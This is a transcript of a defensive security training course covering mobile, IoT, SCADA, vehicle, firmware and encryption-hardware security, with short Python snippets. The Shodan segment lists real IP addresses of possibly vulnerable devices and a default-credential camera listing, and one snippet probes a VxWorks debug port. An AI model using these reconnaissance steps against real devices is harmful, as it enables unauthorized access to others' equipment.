configuring devices on isolated networks, as well as taking a look at SCADA and IoT. I'll start by examining
how to address both mobile device and IoT weaknesses. And we'll show you how to use the shodan.io web site
to examine a list of vulnerable devices. I'll then explore how to physically secure facilities and computing
equipment, how vehicles and drones can present security risks, and how SCADA is used for industrial device
networks. Next, I'll examine the BIOS and UEFI security settings and how self-encrypting drives, SEDs,
provide protection for data at rest. Lastly, I'll explore how hardware security modules or HSMs are used for
encryption offloading and the storage of cryptographic secrets.
[Video description begins] Topic title: Mobile Device Security. The presenter is Dan Lachance. [Video
description ends]
Today's proliferation of mobile device usage adds a lot more work for the standard IT technician in the
enterprise, because it's another class of widely used devices that now need to be secured and supported. We're
talking about things like tablets, smartwatches, smartphones, laptops, and e-reader devices, just to name a few
of the many different types of mobile devices widely in use.
[Video description begins] Subscriber Identity Module (SIM) Cards. [Video description ends]
The SIM card, which stands for Subscriber Identity Module, applies to GSM phones. There are different
types of phones, but a GSM phone uses a SIM card, and the SIM card provides access to a carrier network.
You can also enable SIM card locking. This means that if you were to take the SIM card out of that device, out
of that phone, and plug it into another phone, you would then have to put in the PIN. It's not optional; it's
mandatory if you've enabled SIM card lock. Now bear in mind, on your SIM card, there might be some other
items stored besides your subscriber information for your chosen carrier. You might have some SMS text
messages, some contact lists, and so on. Now SIM cards make it easy to switch phones because the true
identity of the phone that connects it to a carrier network is stored on the card, as opposed to in the phone
itself.
Now there are many potential threats with mobile devices, such as malicious app store apps that people might
download and run on their phones. There's using default settings for phones, not having a strong password or a
more difficult PIN to unlock the phone. There's the lack of device encryption, the lack of enabling SIM card
lock, or having Wi-Fi and Bluetooth enabled when they're not even needed on the device. Geotagging stores
the longitude and latitude coordinates, such as in photo metadata, which could present a personal security
risk; a small sketch of reading those coordinates follows this paragraph. There's also, in some cases with some
types of mobile devices like e-readers, limited update capabilities. If a mobile device is lost or stolen, which
can happen easily because they're very small, then we want to make sure that we've at least enabled
encryption. And even still, if someone has physical access to a device, they can do a lot to it to potentially
retrieve data on it. We want to make sure that screen lockout is timed appropriately, so it's rather frequent. We
also want to make sure that if micro SD cards are being used, they're encrypted, and to minimize the use of
public Wi-Fi connectivity. Every mobile device, where possible, should also have a firewall configured
appropriately and an antivirus app. And then of course, there's the threat of BYOD, bring your own device.
This means that users are putting on the network a mobile device that is theirs personally. It might be used for
business, but it's also got some personal use, which could lead to some risky behavior, such as downloading
apps from an app store that could infect the phone and, in turn, infect the network the phone is connected to.
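To make the geotagging risk concrete, here's a minimal Python sketch, assuming the Pillow imaging library and a hypothetical photo.jpg taken with location services enabled; it simply prints whatever GPS coordinates are embedded in the photo's EXIF metadata.

    # Minimal sketch, assuming Pillow (pip install Pillow) and a hypothetical photo.jpg.
    from PIL import Image
    from PIL.ExifTags import TAGS, GPSTAGS

    exif = Image.open("photo.jpg")._getexif() or {}

    for tag_id, value in exif.items():
        if TAGS.get(tag_id) == "GPSInfo":
            gps = {GPSTAGS.get(k, k): v for k, v in value.items()}
            print("Latitude:", gps.get("GPSLatitude"), gps.get("GPSLatitudeRef"))
            print("Longitude:", gps.get("GPSLongitude"), gps.get("GPSLongitudeRef"))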
[Video description begins] Mobile Device Threat Mitigation. [Video description ends]
What can we do to mitigate some of these mobile device threats? Well the first order of business is to make
sure you have a centralized inventory of devices that you can centrally configure and manage. That happens
with a mobile device management or MDM tool. So centralized policy-based configuration of mobile devices
like smartphones and tablets. You can also configure a security config baseline for a specific mobile operating
system platform. So that devices can be brought into compliance if they are not in line with the standard
security configuration baseline. You can also, for BYOD, create a corporate partition. Essentially, you can
keep corporate and personal apps, corporate and personal settings, and corporate and personal data separate
through partitioning. That facilitates remote wiping for a technician in the enterprise. If a phone is lost, then he
or she could issue a remote wipe command to wipe the corporate partition, but not necessarily the personal one.
After completing this video, you will be able to recognize how to address IoT device weaknesses.
Objectives
[Video description begins] Topic title: IoT Security. The presenter is Dan Lachance. [Video description ends]
Internet of Things or IoT refers to consumer-grade items, used either personally or in some cases in industry,
where those devices have the ability to communicate over the Internet. This would include devices related to
home automation, baby monitors, video surveillance systems, fitness trackers, smart speakers, smart TVs, and
many, many other types of items. So the problem is that many IoT devices have very little security built in, in
some cases none, to the point where there might even be hard-coded usernames and passwords that cannot be
changed, and no firmware updates available to mitigate those issues.
[Video description begins] Internet of Things (IoT) Search Engine. [Video description ends]
This is a search engine which allows you to search for vulnerable Internet of Things or IoT devices. And it's
amazing how easy it is to find these things. Here for example, we can see highlighted a Directory Traversal
vulnerability in a specific type of device. Now, most IoT devices have a web interface that you can connect to.
Most of them are vulnerable to some kind of a web application attack. Directory Traversal means that an
attacker could go through the file system structure within that web application. And potentially gain access to
files that he or she should not have access to.
The Mirai botnet is a great example of the lack of security with IoT devices. The Mirai botnet is a collection
of IoT devices that are under hacker control. For example, some of them could be infected with malware, at
which point the hacker has the ability to control this collection of zombies or bots. The botnet is the collection
of them, and the attacker has the ability to control them. And those IoT devices then might be used to initiate
distributed denial-of-service or DDoS attacks. And on the dark net, or dark web, same thing, the rental of
botnets for this purpose is actually available. So what can we do about this? Well, there are a lot of IoT device
flaws.
The idea being that security simply is not a priority with them, especially with consumer-grade products, less
so with enterprise-grade products. There are many unchangeable default settings, and in some cases the
inability to apply firmware updates. And so what can we do? Well, there are limited choices here. But one
thing is network isolation. So what we could do is place some of these insecure IoT devices on their own
network segments. So if they do get compromised, they're on a network that isn't connected to other devices
that might contain sensitive information, like database servers. We could also enable a guest Wi-Fi network
separate from perhaps a more secured Wi-Fi network used by trusted devices. And where possible, we should
go into the configuration of IoT devices and disable unused features that might present security risks, such as
Universal Plug and Play, for example.
In this video, learn how to access and navigate the Shodan website.
Objectives
The shodan.io web site is a great resource when you want to check out listings of vulnerable devices, primarily
IoT devices.
[Video description begins] A web site labeled "SHODAN" opens in the web browser. It is divided into two
parts. The first part is a menu bar. It includes options labeled "Explore" and "Downloads". The second part is
a content pane. [Video description ends]
Not because you're interested in exploiting any of those vulnerabilities, but just to get a sense of how important
it is to change default settings, isolate vulnerable IoT devices on their own networks, and so on.
[Video description begins] He points to the URL labeled "shodan.io". [Video description ends]
In some cases, you might even want to make sure you air gap some of your networks so they actually have no
connection at all to the Internet. So the first thing, I'm going to do here on the shodan.io web site is, I'll click
Explore up at the top.
[Video description begins] He clicks the "Explore" option. A page labeled "Explore" opens in the content
pane. It is divided into three sections labeled "Featured Categories", "Top Voted", and "Recently Shared". The
"Top Voted" section includes tiles labeled "Webcam" and "Cams". [Video description ends]
And here I've got a number of different categories for different types of devices, including webcams. So, I'm
going to click on Webcam.
[Video description begins] He clicks the "Webcam" tile and the corresponding page opens. It includes a
section labeled "RELATED TAGS:", which further includes tabs labeled "webcam" and "cams". [Video
description ends]
[Video description begins] He clicks the "webcam" tab. A page labeled "Explore Tag: webcam" opens in the
content pane. It includes several tiles labeled "MayGion IP cameras (admin:admin)" and "webcam no
pass". [Video description ends]
And maybe I'll click on this first listing here for MayGion IP cameras.
[Video description begins] He clicks the "MayGion IP cameras (admin:admin)" tile and the corresponding
page opens in the content pane. It is divided into two parts. The first part includes the options labeled "Maps"
and "Explore". The second part includes the information about the login details of the vulnerable devices at
the different parts of the world. [Video description ends]
Now in this listing, what we're seeing are potentially vulnerable devices. That normally results from
people purchasing consumer-grade IoT devices, and just plugging them in and forgetting them. It's convenient
to stick with the defaults. But we know from a security perspective, that is an absolute no-no. So as we go
down, for example, we can see specific details about hosts, like IP addresses of potentially vulnerable
devices.
[Video description begins] He highlights the following text "HTTP/1.1 200 OK". [Video description ends]
There's a web server built into most firmware for IoT devices that allows administration and management of
that device. And we can actually click the link to follow that connection, to the point where we're prompted to
log in and get this kind of screen.
[Video description begins] He clicks the link icon corresponding to "Login" and a web page labeled
"KOYZINA" opens in the web browser. It contains a dialog box labeled "Login". It includes text boxes labeled
"User" and "Password". [Video description ends]
Now of course, what a malicious user would normally do is research that device make and model, and take a
look at the default credentials that are normally shipped with that type of device. Now we're not going to go
down that road, because at that point you're getting into illegal territory. And we don't want to get into that. All
we're doing is trying to identify how incredibly vulnerable many devices are when you just plug them into the
network and do not change the default settings. I'm going to close that out. We are not going down that road.
[Video description begins] He closes the "KOYZINA" web page and returns back to the previous page. [Video
description ends]
[Video description begins] He clicks the "Maps" option and the map of the world opens. It is divided into two
parts. The first part includes options labeled "Shodan" and "Monitor". The second part includes a search bar
and four sections labeled "Total Results:", "Top Services", "Top Countries", and "Top Organizations". [Video
description ends]
Now if you haven't signed in already on the Shodan web site, you don't have to create an account specifically.
You can sign in using your Google ID or Facebook, and so on. So here we have a map of the world. Okay, so
what can we do with this? Well, we can start searching for items. For example, let's say I'm interested in seeing
dlink vulnerable devices.
[Video description begins] He types the text "dlink" in the search bar and the processing starts. [Video
description ends]
So I can search for dlink, and then I can start zooming in to different parts of the world. So for example, let's
go here to the East Coast of Canada. And it looks like we've got a couple of dlink items showing up on the map
already.
[Video description begins] He clicks the dlink item on the map. A dialog box labeled "24.137.110.88" opens. It
includes a button labeled "View Details", a hyperlink labeled "host-24-137-110-88.public.eastlink.ca", and
ports labeled "23", "80", "161", and "443". [Video description ends]
Okay, so if I were to actually point and click on it, I get details about that specific dlink device that potentially
is vulnerable. I can see the IP address.
[Video description begins] He clicks the "View Details" button and a web page labeled "24.137.110.88" opens
in the web browser. It includes the sections labeled "Ports" and "Services". [Video description ends]
And if I click View Details, then we can see even more information as we scroll down about that. So this
would be, again, another way that we might identify any potentially vulnerable devices. It just doesn't end.
[Video description begins] He closes the "24.137.110.88" web page and returns back to the previous
page. [Video description ends]
[Video description begins] He closes the "24.137.110.88" dialog box. [Video description ends]
So the next thing I'm going to do is, go back to the main Shodan web site.
[Video description begins] He clicks the "Shodan" option and the "SHODAN" web page opens in the web
browser. [Video description ends]
And the next thing I want to do after that is, start looking at industrial control systems. So I'm going to click
Explore.
[Video description begins] He clicks the "Explore" option and the "Explore" page opens in the content
pane. [Video description ends]
And I'll click Industrial Control Systems, which is used to control everything from manufacturing to oil
refineries, water systems, the electricity grid, all that type of stuff.
[Video description begins] He clicks the button labeled "Industrial Control Systems" under the "Featured
Categories" section. A page labeled "Industrial Control Systems" opens in the content pane. It includes a
section labeled "Protocols", which further includes several protocols subsections labeled "SIEMENS" and
"dnp". [Video description ends]
And as we scroll down, we can choose the specific type of device or PLCs that we're interested in. Let's say,
I'm interested in SIEMENS S7 PLCs, programmable logic controllers.
[Video description begins] He points to the "SIEMENS" protocol subsection. It includes a button labeled
"Explore Siemens S7". [Video description ends]
And now once again, we're starting to get a list of devices in different parts of the world.
[Video description begins] He clicks the "Explore Siemens S7" button and the corresponding page opens in
the content pane. It is divided into two parts. The first part includes the options labeled "Maps" and "Explore".
The second part includes the information about the devices at the different parts of the world. [Video
description ends]
Of course, we could always click on Maps to start viewing it from that perspective again. And we could start
drilling down and seeing where we might have some vulnerable devices.
[Video description begins] He clicks the "Maps" option and the map of the world opens. [Video description
ends]
[Video description begins] He zooms in to the world map and points to the dlink item on the city labeled
"Montreal". [Video description ends]
But we can start learning about details of these things, and determining whether or not that is a device that
potentially could be open.
[Video description begins] He clicks the dlink item and a dialog box labeled "142.44.189.171" opens. It
includes a button labeled "View Details". [Video description ends]
Now as good guys and good girls, so to speak, we aren't going to exploit anything we discover.
[Video description begins] He clicks the "View Details" button and a web page labeled "142.44.189.171"
opens in the web browser. It includes sections labeled "Ports" and "Services". [Video description ends]
But this is just to demonstrate how easy it is for malicious users to pinpoint where potentially vulnerable
devices might exist on the Internet.
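The same kind of searching we just did in the browser can also be scripted with Shodan's own Python library, which is handy for defensive inventory checks. A minimal sketch, assuming you've installed the shodan package and have your own API key:

    # Minimal sketch using the shodan library (pip install shodan); defensive research only.
    import shodan

    api = shodan.Shodan("YOUR_API_KEY")  # placeholder; supply your own key

    # Search for devices matching a keyword, much like typing "dlink" in the map view.
    results = api.search("dlink")
    print("Total results:", results["total"])

    for match in results["matches"][:5]:
        print(match["ip_str"], match.get("port"), match.get("org"))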
After completing this video, you will be able to list how to physically secure facilities and computing
equipment.
Objectives
[Video description begins] Topic title: Physical Security. The presenter is Dan Lachance. [Video description
ends]
Despite all of our technological security solutions, physical security still plays a very large part in securing
digital assets. Now this is a crucial part of risk assessment. Things like locked buildings, locked doors and
windows, or limited access to different floors in a building, security guards having to check in with a sign in
log when you physically present yourself to a facility. All of this is very important in physical security. Now
the other thing to bear in mind is that we need to have a centralized inventory of physical devices related to
assets. Things like important servers, and of course, the storage arrays that hold the sensitive data that results
from the use of those crucial servers. We need to know the physical location of devices. And we should have
preventative measures put in place.
In other words, security controls, such as lock-down cables for laptop computers, or making sure that server
room doors are always locked and a very limited number of people have access to either a physical key, or the
keypad combination to open the server room door. There's also locked server room racks. So just because
someone has access to a server room shouldn't mean they have access to everything in it, like storage arrays
and servers and KVM switches. So we want to make sure that equipment racks are locked appropriately. On
the physical security side, we have to think about how it relates to the digital world.
One example might be to require client device PKI certificates before allowing physical network access, in
other words, network access control. If a device can somehow get on a network, whether it's wired or wireless,
that's one less thing the attacker has to figure out before they can start conducting a variety of types of attacks
including reconnaissance. Even attacks like ARP cache poisoning require network access. We want to make
sure that we encrypt data at rest in case a storage device is physically stolen. If a storage device is physically
stolen and encryption is not in place, then the thief has full access to that data. But if it's encrypted, there's a
good chance that they will not be able to decrypt and get to the data on the stolen storage device. And there's
also air-gapping networks. An air-gapped network is one that actually isn't physically connected to an
otherwise public network, such as one that is reachable from the Internet, and certainly not plugged in or
connected to a network that might be available through a Wi-Fi router.
Upon completion of this video, you will be able to describe how vehicles such as drones can present security
risks.
Objectives
[Video description begins] Topic title: Drones and Vehicles. The presenter is Dan Lachance. [Video
description ends]
We know that mobile devices like smartphones can present unique security threats to an enterprise
environment.
[Video description begins] Drones and Proximity Security. [Video description ends]
But what about drones? And what about cars? Let's talk about drones first and proximity security. A drone is a
mobile airborne device. And it can be used for many purposes, including, on the security side, reconnaissance
to learn about a property or in the military sense an enemy. Or in law enforcement, about a perpetrator of a
crime. Drones and proximity security begin with regulations. In different parts of the world, drones are
considered to be just regular aircraft. And as a result, you need to acquire a drone pilot certificate. The drone
itself needs to be registered with a central registry. And there might be limitations, such as not allowing the
drone to be flown above a certain height, 122 meters or 400 feet, or not allowing it to be flown at all in
certain restricted airspace areas. So normally, drones are not allowed near airports or anywhere there might be
other aircraft in their flight paths.
Then, there is also the issue of privacy and voyeurism, where a drone could be used to take video, for example,
of someone on their private property, taken from the air. Now, there's this concept of war flying. It's similar
to war driving on a Wi-Fi network, where one would drive around with a device with a high-gain Wi-Fi
antenna to discover wireless networks, such as open wireless networks. Well, war flying is similar, but from a
drone. So a drone might be used, for instance, to discover open Wi-Fi networks, because it would be equipped
with Wi-Fi scanning equipment. Of course, a drone can also be weaponized and used by the military or by law
enforcement, such as for dropping bombs or launching missiles.
The other thing to consider is geo-fencing. The firmware in a drone has geo-fencing software. Now, what this
really means is that it honors no-fly zones, such as airports. And it's based on GPS satellite positioning. So it
can determine the longitude and latitude coordinates of the drone itself to ensure it's not in a no-fly zone.
However, there are some articles on the Internet discussing how to disable the geo-fencing capabilities of
drones in order to circumvent no-fly zones.
Then there's vehicles. Vehicles have internal networks. The one that controls the crucial functionality of a
vehicle is called a Controller Area Network or a CAN bus. It's a bus network that is compliant with ISO
11898-1. It's a serial communication type of network that's used to communicate with electronic control units,
or ECUs, that control various aspects of the vehicle, things like engine start and stop, collision avoidance,
parking assistance, and many other functionalities. There's also another network in a vehicle that's less critical
called a Local Interconnect Network or LIN. So this is a serial network as well, but again, for non-critical
vehicle functions. It uses master and slave controllers or firmware, where each controller has a 7-bit unique
address that maps to OSI Layer 2, the data-link layer, like hardware addresses. And it uses broadcast
transmissions to get things done around the LIN.
Pictured on the screen we have a diagram of a vehicle's CAN bus, where notice on both ends, we've got
between a 110 and 120 ohm terminating resistor for signal absorption. We've got four ECUs, electronic control
units, listed here: the engine controller, the ABS controller, a chassis controller for the vehicle, and an anti-theft
controller. But the reality is that the CAN bus these days in modern vehicles, depending on the vehicle model,
will contain dozens of these ECUs. We're only showing four here. But they are interconnected on the CAN bus
through twisted pair copper wires. Now, what this means then is that all of the nodes can transmit or receive at
any time. There's no notion, as there is on a LIN, of master/slave. It's multi-master on the CAN bus. And
whenever a signal is transmitted to an ECU, like the engine controller, that firmware computes a CRC, a cyclic
redundancy check, to ensure that what it received is what was sent, that nothing's been lost in the transmission.
And if the sending firmware gets no acknowledgement, then it will simply retransmit. Now, there's also a
diagnostics gateway that allows car service technicians to check on each of these ECUs,
and also to apply updates to the firmware. With modern cars, you can also download updates from the
manufacturer's web site and put them on a USB thumb drive that you plug into your car to update it as well.
That's even possible. So the takeaway here is that modern vehicles, drones and cars and trucks, have a lot of
electronics built in and a lot of network capabilities. Vehicles these days can even, on a subscription basis,
connect to a cell phone network, so that you can have an app on your phone to track the location of your car,
maybe to check on where it's travelling to, what the current odometer and fuel readings are, and so on. As a
result, there's a potential for malicious attacks because of that type of connectivity.
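To give a sense of what talking to a CAN bus looks like in software, here's a minimal Python sketch, assuming the python-can library and a Linux SocketCAN interface (for example a virtual vcan0 set up for testing); it just prints a few frames, each with its arbitration ID and data bytes.

    # Minimal sketch, assuming python-can (pip install python-can) and a SocketCAN interface.
    import can

    bus = can.interface.Bus(channel="vcan0", bustype="socketcan")  # vcan0 is a test interface

    for _ in range(5):
        msg = bus.recv(timeout=5.0)  # returns None if nothing arrives in time
        if msg is None:
            break
        print(f"ID=0x{msg.arbitration_id:X} data={msg.data.hex()}")

    bus.shutdown()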
Upon completion of this video, you will be able to recognize how SCADA is used for industrial device
networks.
Objectives
[Video description begins] Topic title: SCADA. The presenter is Dan Lachance. [Video description ends]
[Video description begins] Supervisory Control and Data Acquisition (SCADA). [Video description ends]
Now, this is used to control industrial processes such as with manufacturing or critical infrastructure like
water, electricity, oil refineries. So it consists of both hardware and software to make all of this happen. There
are control stations, intermediaries, and the devices that actually perform the work, often mechanical robotic
devices.
So here we have a diagram of how SCADA all works together. First, at the bottom, we've got a Controller
Area Network or a CAN, otherwise sometimes called a Distributed Control System or DCS. In the middle,
we've got programmable logic controllers, or PLCs. Now, PLCs are used in industrial network environments.
They can execute instructions on industrial devices, which we see on the left of our diagram. Such as on
factory assembly lines, they can control and take readings from pumps, valves, and sensors. And they can be
used within electricity substations for those purposes, to gain telemetry data or to send instructions to
components. Now, PLCs can also talk to industrial devices and relay their telemetry data to a SCADA system.
So on the right, we see SCADA software.
[Video description begins] Common SCADA Transmission Protocol. [Video description ends]
Now, there are a couple of different types of transmission protocols that could be used with SCADA, one of
which is DNP3. This is something that you'll see as a transmission protocol used in North America with water
and electric companies. In Europe, the equivalent is the T101 protocol.
[Video description begins] PLC/RTU Operating Systems. [Video description ends]
Then we've got PLC and RTU operating systems. Now, the RTU is a remote terminal unit, similar to a PLC.
[Video description begins] Real-time operating system abbreviates to RTO. [Video description ends]
They have a real-time operating system such as VxWorks, or a Schneider-based OS, or a Quantum-based OS, or
even Microware OS-9, which is used for Allen-Bradley PLCs.
So what can we do to secure an industrial SCADA network environment? Well, we want to make sure that
PLCs or RTUs are configured in such a way that defaults are not used and unnecessary components are
disabled, and that they are patched, whether we're using OS-9 or VxWorks, and so on. The other thing to
consider, especially when it comes to SCADA control of devices in a military environment, would be to think
about the device supply chain. Who made the components, such as specific firmware chips embedded in
devices, and are they trustworthy?
Then we should consider banning the use of USB thumb drives. There have been known attacks against certain
models of PLCs in the past that have been propagated by unsuspecting people plugging in USB thumb drives
on a network, thus unleashing a worm that can infect other devices on the network or even seek out certain
models of PLCs. The other thing is to always keep details hidden. Never disclose hardware and software
names and versions in use in an industrial environment. And if you're using operating systems such as
VxWorks, then harden them specifically for any weaknesses they might present, such as blocking UDP port
17185, which is used in VxWorks for the debugger.
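As a rough sanity check, and only against hosts you're authorized to test, you could probe UDP port 17185 from a given network segment to see whether anything answers; keep in mind that for UDP a timeout is inconclusive. A minimal Python sketch, with a placeholder target address:

    # Rough sketch: probe the VxWorks debug port (UDP 17185) mentioned above.
    import socket

    target = "192.0.2.10"  # placeholder address; use a host you are authorized to test

    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(3.0)
        s.sendto(b"\x00", (target, 17185))
        try:
            data, addr = s.recvfrom(1024)
            print("Got a response from", addr, "- port 17185 appears reachable")
        except socket.timeout:
            print("No response; the port may be blocked, filtered, or simply silent")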
After completing this video, you will be able to recognize BIOS and UEFI security settings.
Objectives
[Video description begins] Topic title: BIOS and UEFI. The presenter is Dan Lachance. [Video description
ends]
BIOS and UEFI include the firmware instructions that kick in when a machine starts up.
[Video description begins] A web page labeled "BIOS Simulator Center" opens in a web browser. It contains a
sample simulator labeled "Lenovo BIOS Setup Utility". It is divided into two parts. The first part is a menu
bar. It includes the options labeled "Security", "Startup", and "Main". The second part is a content
pane. [Video description ends]
Now here we have a sample simulator for a Lenovo BIOS Setup Utility. And this is an important part of
security. One of the things that we might consider when it comes to BIOS or UEFI security is things like
startup passwords, and whether hardware-enabled encryption through TPM, or Trusted Platform Module, is
enabled, and so on. So let's take a look at some of the things that are worth considering when it comes to
configuring the BIOS or the UEFI on enterprise devices. Now, let's go to the Security tab up here in the
menu.
[Video description begins] He switches to the "Security" option and the corresponding page opens in the
content pane. It includes the fields labeled "Administrator Password" and "Power-On Password" with the
corresponding values labeled "[Not Installed]", the fields labeled "Set Administrator Password" and "Set
Power-On Password" with the corresponding values labeled "[Enter]", and the fields labeled "Windows UEFI
Firmware Update", "Require POP on System Boot", and "Require POP on Restart" with the corresponding
values labeled "[Enabled]", "[Yes]", and "[No]" respectively. [Video description ends]
And you'll normally get to the BIOS or UEFI utility by pressing a certain key when the machine is first booting
up. But when we go into the security settings, one of the first things I notice here is that there is not an
Administrator Password or a Power-On Password.
[Video description begins] He highlights the "Set Administrator Password" field and its corresponding value
"[Enter]". [Video description ends]
We know that because up above, in gray, it says Not Installed for both of those entries.
[Video description begins] He points to the "Administrator Password", "Power-On Password" fields, and their
corresponding values. [Video description ends]
Now the Administrator Password would be required when you want to come into this utility to make changes.
The Power-On Password or POP, as you might gather, is required every time the machine is powered on. So
these are great little security mechanisms that we should set.
[Video description begins] He clicks the "Set Administrator Password" field and a pop-up box labeled "Set
Administrator Password" opens. It includes the fields labeled "Enter New Password", "Confirm New
Password", "[Yes]", and "[No]". The "[Yes]" field is already selected. [Video description ends]
Now when we press Enter on these, we would enter and confirm both the administrator and the Power-On
Password, the POP.
[Video description begins] He clicks the Enter and the "Set Administrator Password" pop-up box
closes. [Video description ends]
The other thing is making sure that the firmware instructions are updated when required on all devices.
[Video description begins] He highlights the “Windows UEFI Firmware Update” field and its corresponding
value "[Enabled]". [Video description ends]
This means you have to have an inventory of what's out on your network, so you know what versions of
firmware are there. Then from that point you can determine if they need to be updated. Now often when you
go to the Main part of the BIOS utility, which I've done here at the top in the menu, we'll be able to see any
details related to the revision level and the date.
[Video description begins] He clicks the "Main" option and the corresponding page opens in the content pane.
It includes the fields labeled "BIOS Revision Level", "Boot Block Revision Level", and "BIOS Date
(MM/DD/YYYY)" with the corresponding values labeled "O2HKT", "1.x", and "xx/xx/xxx" respectively. [Video
description ends]
This way we can determine if there's a newer version that we should apply that might either enhance features,
remove bugs, or close security holes. Let's go back to Security though for a second.
[Video description begins] He switches back to the "Security" option and the corresponding page opens. It
includes the options labeled "TCG Feature Setup" and "Secure Boot". [Video description ends]
The other thing is, do we require a POP, that's a Power-On Password when the system is simply booted or
restarted?
[Video description begins] He highlights the "Require POP on System Boot" field with a corresponding value
"[Yes]". [Video description ends]
[Video description begins] He highlights the "Require POP on Restart" field with a corresponding value
"[No]". [Video description ends]
Then we have the option of TCG. Do we want to enable Firmware TPM, Trusted Platform Module?
[Video description begins] He clicks the "TCG Feature Setup" option and a page labeled "TCG Feature
Setup" opens. It includes the fields labeled "TCG Security Device" and "Security Chip 2.0" with the
corresponding values labeled "Firmware TPM" and "[Enabled]" respectively. The "TCG Security Device"
field with corresponding value "Firmware TPM" is already highlighted. [Video description ends]
TPM has the ability to store cryptographic keys on this device. So on a laptop, let's say, running Windows 10,
you might want to enable BitLocker, if your edition of Windows 10 supports that, so that you can encrypt disk
volumes so they're protected when the machine's powered off. And that can be tied in with the firmware TPM,
so that if the machine is stolen and the drive is ripped out and plugged into another station, the keys aren't
even available because it's a different TPM and a different machine. So we've got a number of options
available there.
[Video description begins] He switches back to the previous page. [Video description ends]
We've also got the Secure Boot option, which is currently set to Disabled.
[Video description begins] He clicks the "Secure Boot" option and a page labeled "Secure Boot" opens. It
includes a table. The table contains four rows and two columns. The column headers labeled "Secure Boot
Status" and "User Mode". The table includes the row entries labeled "Secure Boot" and "[Disabled]" under
the column headers "Secure Boot Status" and "User Mode" respectively. [Video description ends]
Secure Boot, when it's Enabled, is used to determine if there have been any start-up changes to the operating
system bootloader. It prevents malware from kicking in as the machine is starting up.
[Video description begins] He clicks the row entry "[Disabled]". A pop-up box opens, which contains two
options "Disabled" and "Enabled". [Video description ends]
So we have the option of enabling Secure Boot as well. So there are a number of these items then that we
should consider at the security level for hardware devices. And it doesn't have to be just a physical server that
we deem important enough to configure this way. Even on every user laptop and desktop, this is something
that we might consider from a hardening perspective.
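If you want to verify the Secure Boot state from inside an operating system rather than from the firmware screen, here's a minimal Python sketch, assuming a Linux host booted in UEFI mode; it reads the SecureBoot EFI variable, whose last byte is 1 when Secure Boot is enabled and 0 when it's disabled. (On Windows, the PowerShell cmdlet Confirm-SecureBootUEFI reports the same thing.)

    # Minimal sketch, assuming Linux booted in UEFI mode with efivarfs mounted.
    from pathlib import Path

    var = Path("/sys/firmware/efi/efivars/"
               "SecureBoot-8be4df61-93ca-11d2-aa0d-00e098032b8c")

    if not var.exists():
        print("No SecureBoot EFI variable; the system may be booted in legacy BIOS mode")
    else:
        state = var.read_bytes()[-1]  # first 4 bytes are attributes, last byte is the value
        print("Secure Boot is", "enabled" if state == 1 else "disabled")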
Upon completion of this video, you will be able to recognize how SEDs provide protection for data at rest.
Objectives
[Video description begins] Topic title: Self Encrypting Drives. The presenter is Dan Lachance. [Video
description ends]
One way to protect data at rest is to use Self Encrypting Drives or SEDs.
[Video description begins] Self Encrypting Drives (SEDs). [Video description ends]
This provides protection at the hardware level for the data stored on a drive, if the drive or the device housing
the drive is lost or stolen. And depending on the configuration of the self encrypting drive, it might not require
any user interaction after it's configured. Now, it would require user interaction if you're using an
authentication key or an AK. If an authentication key is required, the user will be prompted to enter it
when the machine is powered on. Now that's just an additional security measure to unlock or decrypt the drive.
[Video description begins] Authentication key abbreviates to AK. [Video description ends]
That's beyond simply possessing the device that houses that encrypted drive. Now in order to use authentication
keys, your motherboard BIOS or UEFI has to support it and has to be enabled for it. So encryption and
decryption then are automatic after the authentication key is supplied.
[Video description begins] Drive is locked when power is removed or drive is moved to another
computer. [Video description ends]
The thing to bear in mind as well is that Self Encrypting Drives also can allow for regulatory compliance
where data at rest needs to be protected.
[Video description begins] Self Encrypting Drives. [Video description ends]
Such as with FIPS 140-2 compliance. Now, this means that it's certified by the National Institute of Standards
and Technology in the United States as being a secure device using cryptographic modules to protect
information securely. Self encrypting drives also support crypto-shredding, otherwise called cryptographic
erase. What does this mean? Well, what it means is that if you destroy the cryptographic keys that are used to
protect the drive, then the loss of the keys means that you can't get to the data; hence, it's irretrievable, or you
could say, in a sense, it's deleted.
[Video description begins] Self Encrypting Drives Security Issues. [Video description ends]
Now what are some security issues we should be aware of regarding Self Encrypting Drives? Well, the whole
idea is that you need to be in the habit of powering off your machine when not in use, which is when the drive
is locked and encrypted. Because once the machine is powered on and perhaps you've entered in the
authentication key, it's business as usual. It's as if nothing is encrypted on the drive while the machine is
running. And so, if the drive is moved to a different machine while power is maintained, and there are ways
that that can actually be done, then that could be a security problem, because the contents of the drive are
readily available. If a malicious user can somehow use a LiveCD to boot up without cutting power, then they
potentially could gain access to the contents of the Self Encrypting Drive. And depending on the configuration
of user laptops, if sleep mode kicks in and the machine goes to sleep, yet there's enough power to retain
memory contents, then the encryption password could be retained in memory. Which means when you wake
up the laptop, you're not prompted for an authentication key or anything like that. So, while Self Encrypting
Drives are very useful, we just need to be aware of some of the limitations.
Upon completion of this video, you will be able to recognize how HSMs are used for encryption offloading
and storing cryptographic secrets.
Objectives
recognize how HSMs are used for encryption offloading and the storage of cryptographic secrets
[Video description begins] Topic title: Hardware Security Module. The presenter is Dan Lachance. [Video
description ends]
A hardware security module or HSM provides protection and storage for cryptographic secrets at the hardware
or firmware level.
[Video description begins] Hardware Security Module (HSM). [Video description ends]
So it supports hardware crypto processing. This means that all of the key functionality for cryptographic keys,
things like generating keys and using keys for encryption and decryption, storing keys, creating digital
signatures or hashes. All of that type of crypto processing work can be handled by the hardware security
module. Now, this is a good thing because it offloads those tasks from a server that might otherwise be very
busy already. Now, HSMs are FIPS 140-2 compliant. This means that they are compliant with US government
security standards for cryptographic modules. Now, the hardware security module or HSM solution that you
decide to use, it's an external unit. It needs to be configured to work with your specific server operating system,
whether you're running Windows or a variation of Linux or AIX Unix or Solaris Unix.
So pictured on the screen, we have a sense of where the HSM falls into play in the overall ecosystem of an IT
computing environment. So let's say, for example, that we've got our server shown in the very bottom left here
that's got a Gigabit Ethernet connection to the HSM. So the HSM is another hardware appliance on the
network that's got to be connected to the server. And the HSM, in this case, might store and manage our
cryptographic keys. Now, those keys might be used to encrypt data at rest, or they could be used for other
purposes. For example, users might make an HTTPS or VPN connection to a secured resource where the keys
that allow that HTTPS or VPN connection were generated by the HSM, which, in turn, might allow for users
to replicate data securely to other locations for high availability, which, in turn, allows for data access. So
hardware security modules then provide a lot of cryptographic services, including key generation and
management.
